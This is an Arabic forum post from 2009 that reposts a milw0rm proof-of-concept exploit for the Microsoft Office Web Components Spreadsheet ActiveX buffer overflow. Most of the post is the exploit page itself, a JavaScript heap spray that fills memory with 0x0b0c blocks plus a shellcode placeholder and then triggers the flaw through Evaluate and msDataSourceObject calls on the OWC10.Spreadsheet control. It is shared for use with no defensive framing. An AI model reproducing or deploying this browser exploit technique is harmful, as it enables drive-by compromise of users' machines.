لقد تم نقل المنتدى الى www.xmazzika.tk
لقد تم نقل المنتدى الى www.xmazzika.tk
لقد تم نقل المنتدى الى www.xmazzika.tk
لقد تم نقل المنتدى الى www.xmazzika.tk
لقد تم نقل المنتدى الى www.xmazzika.tk
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


لقد تم نقل المنتدى الى www.xmazzika.tk
 
الرئيسية0000أحدث الصورالتسجيلدخول
اهلا وسهلا بكم فى منتدى اكـس مزيكا الاول فى الحصريات والانفرادات
عمر المنتدى بالايام 5604 اخر عضو مسجل هو دنيال مرحبا به

 

 02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B

اذهب الى الأسفل 
كاتب الموضوعرسالة
????
زائر




02222255[1]  ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B Empty
مُساهمةموضوع: 02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B   02222255[1]  ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B Icon_minitimeالثلاثاء يوليو 28, 2009 12:08 pm

السلام عليكم اخواني

ثغرة ActiveX BOF PoC تنزل للميلوورم بتاريخ أمس


http://www.milw0rm.com/exploits/9163



كود PHP:
<!-- http://en.securitylab.ru/poc/extra/382458.php -->
<html>
<****>
<script ********="**********">
var shellcode = unescape("evil code");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++) {
array[i] = lh + lh + shellcode;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++){
for(j=0;j<10;j++){
try{
obj.Evaluate(e[i]);
}
catch(e)
{}
}
}
window.status=e[3] +'';
for(j=0;j<10;j++){
try{
obj.msDataSourceObject(e[3]);
}
catch(e)
{}
}
</script>
</****>
</html>

# milw0rm.com [2009-07-16]




سلام
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
لقد تم نقل المنتدى الى www.xmazzika.tk :: عالم الكمبيوتر و الانترنت :: البرامج-
انتقل الى: